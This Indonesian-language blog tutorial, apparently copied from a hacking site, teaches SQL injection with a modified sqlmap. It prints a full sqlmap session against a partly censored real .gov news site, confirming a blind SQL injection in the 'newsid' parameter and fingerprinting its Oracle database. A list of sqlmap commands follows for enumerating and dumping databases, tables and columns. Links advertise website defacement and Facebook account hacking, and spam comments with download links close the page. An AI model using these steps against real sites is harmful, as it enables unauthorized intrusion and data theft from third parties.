Bahan-bahan yang diperlukan
- Tool SQLMap Download.zip atau Download.rar
- Server atau PC yang terinstall phyton
- dan target yang memiliki vulnerabillity SQL Injection
Kelebihan SQL Map:
1. Melakukan SQL Injection dengan beberapa method
- Boolean-Based Blind SQL Injection
- Time-Based Blind SQL Injection
- Error-Based SQL Injection
- UNION Query SQL Injection
- Stacked Query SQL Injection
2. Bisa berjalan baik untuk beberapa jenis database seperti:
- MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase & SAP MaxDB
kita akan mencoba untuk melakukan “Fingerprinting Database & Kelemahan SQL” pada sebuah website target.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 | # Target [URL]: http://<<sensor>>.gov/news/index.php?newsid=187 D:\binushacker\injection>sqlmap.py -u http://<<sensor>>.gov/news/index.php?newsid=187 -f sqlmap/0.10 modified by BinusHacker Team - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net Added new feature by BinusHacker Team: - Speed acceleration - Request limitation - Queries management [*] starting at: 13:43:24 [13:43:25] [INFO] using 'D:\binushacker\injection\output\<<sensor>>.gov\session' as session file [13:43:25] [INFO] testing connection to the target url [13:43:26] [INFO] testing if the url is stable, wait a few seconds [13:43:28] [INFO] url is stable [13:43:28] [INFO] testing if GET parameter 'newsid' is dynamic [13:43:28] [INFO] confirming that GET parameter 'newsid' is dynamic [13:43:29] [INFO] GET parameter 'newsid' is dynamic [13:43:30] [WARNING] heuristic test shows that GET parameter 'newsid' might not be injectable [13:43:30] [INFO] testing sql injection on GET parameter 'newsid' [13:43:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [13:43:33] [INFO] GET parameter 'newsid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [13:43:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [13:43:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [13:43:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' [13:43:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [13:43:36] [INFO] testing 'MySQL > 5.0.11 stacked queries' [13:43:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [13:43:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [13:43:37] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [13:43:38] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [13:43:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [13:43:39] [INFO] testing 'Oracle AND time-based blind' [13:43:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [13:43:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [13:43:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS GET parameter 'newsid' is vulnerable. Do you want to keep testing the others? [y/N] n sqlmap identified the following injection points with a total of 36 HTnewsid(s) requests: --- Place: GET Parameter: newsid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: newsid=187 AND 309=309 --- [13:44:14] [INFO] testing MySQL [13:44:16] [WARNING] the back-end DBMS is not MySQL [13:44:16] [INFO] testing Oracle [13:44:20] [INFO] confirming Oracle [13:44:23] [INFO] the back-end DBMS is Oracle [13:44:23] [INFO] actively fingerprinting Oracle web server operating system: Linux Debian or Ubuntu 4.0 (etch) web application technology: Apache 2.2.3, PHP 4.4.4 back-end DBMS: active fingerprint: Oracle 10g [13:44:26] [INFO] Fetched data logged to text files under 'D:\binushacker\injection\output\<<sensor>>.gov' [*] shutting down at: 13:44:26 |
Nah, dari sana kelihatan bahwa target “.gov” tersebut memiliki kelemahan di “boolean-based blind sql injection”
Selanjutnya, <<Di sensor, You Know Ya! >>
Berikut adalah beberapa command penting di SQLMAP
Untuk melakukan scanning terhadap Target [URL]
./sqlmap.py -u[url]
Untuk mendapatkan informasi database Target [URL]
./sqlmap.py -u[url] –dbs
Untuk mendapatkan informasi table di database Target [URL]
./sqlmap.py -u [url] –tables -D [database]
Untuk mendapatkan informasi kolom didalam table yang ada didatabase Target [URL]
./sqlmap.py -u [url] –columns -T [table name] -D [databasename]
Untuk melakukan dump kolom, table dan database Target [URL]
./sqlmap.py -u [url] –dump –columns -T [table name] -D [databasename]
Untuk melakukan dump spesifik kolom Target [URL]
./sqlmap.py -u [url] –dump -C [column name] -T [table name] -D [database name]
Tutorial lengkap ada didalam video berikut:
Sumber Binus Hacker.net Lengkap
1. BELAJAR MYSQL
2. Cara Mendeface Website
3. Cara Hack Website
4. Cara Hack akun Facebook
1. BELAJAR MYSQL
2. Cara Mendeface Website
3. Cara Hack Website
4. Cara Hack akun Facebook
Tutorial Networking: Hacking Dengan Sqlmap >>>>> Download Now
ReplyDelete>>>>> Download Full
Tutorial Networking: Hacking Dengan Sqlmap >>>>> Download LINK
>>>>> Download Now
Tutorial Networking: Hacking Dengan Sqlmap >>>>> Download Full
>>>>> Download LINK 3e